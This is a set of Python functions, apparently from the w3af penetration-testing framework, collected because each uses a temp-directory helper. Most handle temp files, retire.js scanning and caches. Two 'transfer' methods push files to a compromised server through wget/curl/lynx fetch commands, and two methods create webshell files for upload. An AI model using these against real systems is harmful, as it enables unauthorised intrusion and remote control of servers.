def _retire_smoke_test(self): check_file = tempfile.NamedTemporaryFile(prefix='retirejs-check-', suffix='.js', delete=False, dir=get_temp_dir()) check_file.write('') check_file.close() output_file = tempfile.NamedTemporaryFile(prefix='retirejs-output-', suffix='.json', delete=False, dir=get_temp_dir()) output_file.close() args = (output_file.name, check_file.name) cmd = self.RETIRE_CMD % args process = subprocess.Popen(shlex.split(cmd), stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) process.wait() self._remove_file(output_file.name) self._remove_file(check_file.name) if process.returncode != 0: msg = 'Unexpected retire.js exit code. Disabling grep.retirejs plugin.' om.out.error(msg) return False else: om.out.debug('retire.js returned the expected exit code.') return True
def transfer(self, data_str, destination): """ This method is used to transfer the data_str from w3af to the compromised server. """ if not self._command: self.can_transfer() commandTemplates = {} commandTemplates['wget'] = 'wget http://%s:%s/%s -O %s' commandTemplates['lynx'] = 'lynx -source http://%s:%s/%s > %s' commandTemplates['curl'] = 'curl http://%s:%s/%s > %s' # Create the file filename = rand_alpha(10) file_path = get_temp_dir() + os.path.sep + filename f = file(file_path, 'w') f.write(data_str) f.close() # Start a web server on the inbound port and create the file that # will be fetched by the compromised host webserver.start_webserver(cf.cf.get('local_ip_address'), self._inbound_port, get_temp_dir()) commandToRun = commandTemplates[self._command] % \ (cf.cf.get('local_ip_address'), self._inbound_port, filename, destination) self._exec_method(commandToRun) os.remove(file_path) return self.verify_upload(data_str, destination)
def _create_file(self, extension): """ Create a file with a webshell as content. :return: Name of the file that was created. """ # Get content file_content, real_extension = shell_handler.get_webshells(extension, force_extension=True)[0] if extension == '': extension = real_extension # Open target temp_dir = get_temp_dir() low_level_fd, path_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + extension, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") # Write content to target file_handler.write(file_content) file_handler.close() path, file_name = os.path.split(path_name) return path, file_name
def _create_file(self, extension): """ Create a file with a webshell as content. :return: Name of the file that was created. """ # Get content file_content, real_extension = shell_handler.get_webshells( extension, force_extension=True)[0] if extension == '': extension = real_extension # Open target temp_dir = get_temp_dir() low_level_fd, path_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + extension, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") # Write content to target file_handler.write(file_content) file_handler.close() path, file_name = os.path.split(path_name) return path, file_name
def _main(self, url): """ This was taken from the original halberd, 'script/halberd' . """ scantask = halberd_scan_task.ScanTask() scantask.scantime = halberd_scan_task.default_scantime scantask.parallelism = halberd_scan_task.default_parallelism scantask.verbose = False scantask.debug = True scantask.conf_file = halberd_scan_task.default_conf_file scantask.cluefile = '' scantask.save = '' temp_output = tempfile.NamedTemporaryFile(delete=False, dir=get_temp_dir(), prefix='w3af-halberd-', suffix='.output') scantask.out = temp_output.name halberd_logger.setError() try: scantask.readConf() except halberd_scan_task.ConfError, e: # halberd: 'unable to create a default conf. file' # https://github.com/andresriancho/w3af/issues/9988 om.out.error('Failed to initialize Halberd configuration: "%s"' % e) return
def clear_default_temp_db_instance(): global temp_default_db if temp_default_db is not None: temp_default_db.close() temp_default_db = None os.unlink('%s/main.db' % get_temp_dir())
def get_default_temp_db_instance(): global temp_default_db if temp_default_db is None: create_temp_dir() temp_default_db = SQLiteDBMS('%s/main.db' % get_temp_dir()) return temp_default_db
def _remove_files(self, fileh_filen_list): """ Close all open files and remove them from disk. This is the reverse of _create_files method. :param fileh_filen_list: A list of tuples as generated by _create_files :return: None >>> from w3af.core.controllers.misc.temp_dir import create_temp_dir >>> _ = create_temp_dir() >>> fu = file_upload() >>> dir_before = os.listdir( get_temp_dir() ) >>> fileh_filen_list = fu._create_files() >>> fu._remove_files(fileh_filen_list) >>> dir_after = os.listdir( get_temp_dir() ) >>> dir_before == dir_after True """ for tmp_file_handle, tmp_file_name in fileh_filen_list: try: tmp_file_handle.close() fname = os.path.join(get_temp_dir(), tmp_file_name) os.remove(fname) except: pass
def _retirejs_is_installed(self): """ Runs retirejs on an empty file to check that the return code is 0, this is just a safety check to make sure everything is working. It is only run once. :return: True if everything works """ if self._retirejs_exit_code_was_run: return self._retirejs_exit_code_result check_file = tempfile.NamedTemporaryFile(prefix='retirejs-check-', suffix='.js', delete=False, dir=get_temp_dir()) check_file.write('') check_file.close() output_file = tempfile.NamedTemporaryFile(prefix='retirejs-output-', suffix='.json', delete=False, dir=get_temp_dir()) output_file.close() args = (output_file.name, check_file.name) cmd = self.RETIRE_CMD % args try: subprocess.check_output(shlex.split(cmd)) except subprocess.CalledProcessError: msg = ('Unexpected retire.js exit code.' ' Disabling grep.retirejs plugin.') om.out.error(msg) self._retirejs_exit_code_was_run = True self._retirejs_exit_code_result = False else: om.out.debug('retire.js returned the expected exit code.') self._retirejs_exit_code_was_run = True self._retirejs_exit_code_result = True finally: self._remove_file(output_file.name) self._remove_file(check_file.name) return self._retirejs_exit_code_result
def get_temp_file(_type): """ :return: A named temporary file which will not be removed on close """ temp = tempfile.NamedTemporaryFile(prefix='w3af-%s-' % _type, suffix='.pebble', delete=False, dir=get_temp_dir()) return temp
def get_db_backend(self): if self._db_backend is None: # fd, self._db_backend = tempfile.mkstemp(prefix='w3af-api-log', # suffix='shelve', # dir=tempfile.tempdir) # os.close(fd) # os.unlink(self._db_backend) self._db_backend = os.path.join(get_temp_dir(), 'w3af-api-log') return self._db_backend
def get_temp_file(): # # Create the temp file # tempdir = get_temp_dir() if not os.path.exists(tempdir): os.makedirs(tempdir) filename = ''.join([choice(string.letters) for _ in range(12)]) temp_file = os.path.join(tempdir, filename + '-w3af.bloom') return temp_file
def _run_retire_on_batch(self, batch): """ Analyze a set of files and return the result as JSON :param batch: The batch of file to analyze (url, filename) :return: JSON document """ json_file = tempfile.NamedTemporaryFile(prefix='retirejs-output-', suffix='.json', delete=False, dir=get_temp_dir()) json_file.close() args = (json_file.name, self._retire_db_filename, self._get_js_temp_directory()) cmd = self.RETIRE_CMD_JSREPO % args try: returncode = subprocess.call(shlex.split(cmd), stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=self.RETIRE_TIMEOUT) except subprocess.TimeoutExpired: # The process timed out and the returncode was never set om.out.debug('The retirejs process for batch %s timeout out' % batch) return dict() # retirejs will return code != 0 when a vulnerability is found # we use this to decide when we need to parse the output if returncode == 0: self._remove_file(json_file.name) return dict() try: file_contents = file(json_file.name).read() except Exception: msg = 'Failed to read retirejs output file at %s' om.out.debug(msg % json_file.name) self._remove_file(json_file.name) return dict() try: json_doc = json.loads(file_contents) except Exception, e: msg = ('Failed to parse retirejs output as JSON.' ' Exception is "%s" and file content: "%s..."') args = (e, file_contents[:20]) om.out.debug(msg % args) self._remove_file(json_file.name) return dict()
def create_tempfile(self, encoded_data): _file = tempfile.NamedTemporaryFile(mode='w+b', suffix=self.DATA_SUFFIX, prefix=self.DATA_PREFIX, delete=False, dir=get_temp_dir()) data = self.decode_b64_data(encoded_data) _file.write(data) _file.close() return _file.name
def create_temp_profile(scan_profile): """ Writes the scan_profile to a file :param scan_profile: The contents of a profile configuration :return: The scan profile file name and the directory where it was created """ temp_dir = get_temp_dir() temp_dir = os.path.exists(temp_dir) and temp_dir or tempdir scan_profile_file = os.path.join(temp_dir, '%s.pw3af' % uuid4()) with open(scan_profile_file, 'w') as fp: fp.write(scan_profile) return scan_profile_file, temp_dir
def transfer(self, data_str, destination): """ This method is used to transfer the data_str from w3af to the compromised server. """ if not self._command: self.can_transfer() cmd_templates = { "wget": "wget http://%s:%s/%s -O %s", "lynx": "lynx -source http://%s:%s/%s > %s", "curl": "curl http://%s:%s/%s > %s", } # Create the file filename = rand_alpha(10) file_path = get_temp_dir() + os.path.sep + filename f = file(file_path, "w") f.write(data_str) f.close() # Start a web server on the inbound port and create the file that # will be fetched by the compromised host webserver.start_webserver(cf.cf.get("local_ip_address"), self._inbound_port, get_temp_dir()) cmd_to_run = cmd_templates[self._command] % ( cf.cf.get("local_ip_address"), self._inbound_port, filename, destination, ) self._exec_method(cmd_to_run) os.remove(file_path) return self.verify_upload(data_str, destination)
def test_removes_cache(self): url = URL(get_moth_http()) self.uri_opener.GET(url, cache=False) # Please note that this line, together with the tearDown() act as # a test for a "double call to end()". self.uri_opener.end() db_fmt = 'db_unittest-%s' trace_fmt = 'db_unittest-%s_traces/' temp_dir = get_temp_dir() for i in xrange(100): test_db_path = os.path.join(temp_dir, db_fmt % i) test_trace_path = os.path.join(temp_dir, trace_fmt % i) self.assertFalse(os.path.exists(test_db_path), test_db_path) self.assertFalse(os.path.exists(test_trace_path), test_trace_path)
def _download_retire_db(self): """ Downloads RETIRE_DB_URL, saves it to the w3af temp directory and saves the full path to the DB in self._retire_db_filename :return: None """ # Only download once (even when threads are used) with self._plugin_lock: if self._retire_db_filename is not None: return # w3af grep plugins shouldn't (by definition) perform HTTP requests # But in this case we're breaking that general rule to retrieve the # DB at the beginning of the scan try: http_response = self._uri_opener.GET(self._retire_db_url, binary_response=True, respect_size_limit=False) except Exception as e: msg = 'Failed to download the retirejs database: "%s"' om.out.error(msg % e) return if http_response.get_code() != 200: msg = ('Failed to download the retirejs database, unexpected' ' HTTP response code %s') om.out.error(msg % http_response.get_code()) return om.out.debug('Successfully downloaded the latest retirejs DB') db = tempfile.NamedTemporaryFile(dir=get_temp_dir(), prefix='retirejs-db-', suffix='.json', delete=False, mode='wb') json_db = http_response.get_raw_body() db.write(json_db) db.close() self._retire_db_filename = db.name
def svn_wc_db(self, body): """ Analyze the contents of the HTTP response body to identify if it is a SVN database (wc.db) and extract filenames. :param body: Potentially a wc.db file. :return: Filenames stored in the DB """ filenames = set() temp_db = tempfile.NamedTemporaryFile(prefix='w3af-find-dvcs-', suffix='-wc.db', delete=False, dir=get_temp_dir()) temp_db_fh = file(temp_db.name, 'w') temp_db_fh.write(body) temp_db_fh.close() query = ('SELECT local_relpath, ' ' ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" AS svn' ' FROM NODES WHERE kind="file"') try: conn = sqlite3.connect(temp_db.name) cursor = conn.cursor() cursor.execute(query) query_result = cursor.fetchall() for path, svn_path in query_result: filenames.add(path) filenames.add(svn_path) except Exception as e: msg = 'Failed to extract filenames from wc.db file. The exception was: "%s"' args = (e,) om.out.debug(msg % args) finally: if os.path.exists(temp_db.name): os.remove(temp_db.name) return filenames
def _run_retire_on_batch(self, batch): """ Analyze a set of files and return the result as JSON :param batch: The batch of file to analyze (url, filename) :return: JSON document """ json_file = tempfile.NamedTemporaryFile(prefix='retirejs-output-', suffix='.json', delete=False, dir=get_temp_dir()) json_file.close() args = (json_file.name, self._retire_db_filename, self._get_js_temp_directory()) cmd = self.RETIRE_CMD_JSREPO % args process = subprocess.Popen(shlex.split(cmd)) # This will terminate the retirejs process in case it hangs t = Timer(self.RETIRE_TIMEOUT, kill, [process]) t.start() # Wait for the retirejs process to complete process.wait() # Cancel the timer if it wasn't run t.cancel() # retirejs will return code != 0 when a vulnerability is found # we use this to decide when we need to parse the output json_doc = [] if process.returncode != 0: try: json_doc = json.loads(file(json_file.name).read()) except Exception, e: msg = 'Failed to parse retirejs output. Exception: "%s"' om.out.debug(msg % e)
def _create_files(self): """ If the extension is in the templates dir, open it and return the handler. If the extension isn't in the templates dir, create a file with random content, open it and return the handler. :return: A list of tuples with (file handler, file name) """ result = [] for ext in self._extensions: # Open target temp_dir = get_temp_dir() low_level_fd, file_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + ext, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") template_filename = 'template.' + ext if template_filename in os.listdir(self.TEMPLATE_DIR): content = file( os.path.join(self.TEMPLATE_DIR, template_filename)).read() else: # Since I don't have a template for this file extension, I'll # simply put some random alnum inside the file content = rand_alnum(64) # Write content to target file_handler.write(content) file_handler.close() # Open the target again, should never fail. file_handler = file(file_name, 'r') _, file_name = os.path.split(file_name) result.append((file_handler, file_name)) return result
def _create_files(self): """ If the extension is in the templates dir, open it and return the handler. If the extension isn't in the templates dir, create a file with random content, open it and return the handler. :return: A list of tuples with (file handler, file name) """ result = [] for ext in self._extensions: # Open target temp_dir = get_temp_dir() low_level_fd, file_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + ext, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") template_filename = 'template.' + ext if template_filename in os.listdir(self.TEMPLATE_DIR): content = file( os.path.join(self.TEMPLATE_DIR, template_filename)).read() else: # Since I don't have a template for this file extension, I'll simply # put some random alnum inside the file content = rand_alnum(64) # Write content to target file_handler.write(content) file_handler.close() # Open the target again, should never fail. file_handler = file(file_name, 'r') _, file_name = os.path.split(file_name) result.append((file_handler, file_name)) return result
def __init__(self): self._db = get_default_temp_db_instance() self._session_dir = os.path.join(get_temp_dir(), self._db.get_file_name() + '_traces')
def get_cache_path(): return os.path.join(get_temp_dir(), 'xml_file')
def get_temp_filename(): temp_dir = get_temp_dir() fname = ''.join(starmap(choice, repeat((string.letters, ), 18))) filename = os.path.join(temp_dir, fname + '.w3af.temp_db') return filename
def _get_js_temp_directory(self): if self._js_temp_directory is None: self._js_temp_directory = tempfile.mkdtemp(dir=get_temp_dir()) return self._js_temp_directory
def get_temp_filename(): temp_dir = get_temp_dir() fname = ''.join(starmap(choice, repeat((string.letters,), 18))) filename = os.path.join(temp_dir, fname + '.w3af.temp_db') return filename